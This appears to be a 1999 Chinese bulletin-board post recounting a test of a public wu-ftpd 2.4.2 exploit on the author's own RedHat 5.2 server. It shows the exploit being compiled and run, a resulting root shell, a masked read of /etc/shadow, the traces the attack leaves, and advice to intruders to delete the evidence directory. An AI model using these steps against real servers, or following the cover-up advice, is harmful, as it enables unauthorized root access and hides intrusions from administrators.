发信人: deepin()
整理人: williamlong(1999-05-14 17:22:54), 站内信件
|
好久没玩这个了,虽然这个exploit公布了几个月,今天才心血来潮
试了试,结果如下:bluelight,zer9,asmcat,purewater..等高手不准
笑我,呵呵.环境:redhat5.2,wu-2.4.2-academ[BETA-18],为了方便
测试/pub已经被我改为a+w ,匿名可写.
gcc -o foo foo.c
foo localhot /pub -l ftp -p [email protected]
(一串乱码,但又提示见了一个目录)..然后不动了?
ls
sh (就是这样的,和imap的remoteshell一样没有提示符)
id
uid=0(root) gid=0(root)
cd /etc
cat shadow
root:XXXxX..... [我主机的shadow,不许看 ;) ]
....
嗯...果然有效
如何知道被别人用这个方法入侵了?
看我 cd /home/ftp/pub ;ls
drwxrwsrwx 3 root ftp 1024 May 4 21:59 .
drwxr-xr-x 6 root root 1024 May 3 1998 ..
drwxr-sr-x 3 ftp ftp 1024 May 4 21:59 ??????????????? ?????????????????????????????????????????????????????????????????????? ?????????????????????????????????????????????????????????????????????? ?????????????????????????????????????????????
哦.刚才运行时做的目录现在看是这样的...查一查是什么时候建的目录
21:59?不过/var/log/message里没有啊?why?接着来.
[root@deepin ftp]# ftp localhost
Connected to localhost.
220 deepin.net FTP server (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT 1998) ready.
Name (localhost:root): ftp
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd pub
250 CWD command successful.
ftp> ls -la
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 3
drwxrwsrwx 3 root ftp 1024 May 4 13:59 .
drwxr-xr-x 6 root root 1024 May 2 1998 ..
drwxr-sr-x 3 ftp ftp 1024 May 4 13:59
226 Transfer complete.
ftp> Transfer complete.
13:59 这个目录在ftp时看不见?????????????? ...
再到message里查查.
May 4 13:59:19 deepin ftpd[768]: ANONYMOUS FTP LOGIN FROM localhost [ 127.0.0.1], [email protected]
呵呵,原来你是从127.0.0.1 连上来的--其实就是我自己了 :-)
所以,如果你用这个方法进入以后,一定记住
cd /home/ftp/自己的可写目录
rm * -rf
干掉?????????????????????????????????????????????????????????????????? ?????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????
目录...你的主页也被删了?哈哈,不要怪我.
嗯,如果我是adm 我坚决不在redhat上开anonymous ftp
再次重申,各位高手不许"骂"我 :))
-- ※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.103.31.237]
|
|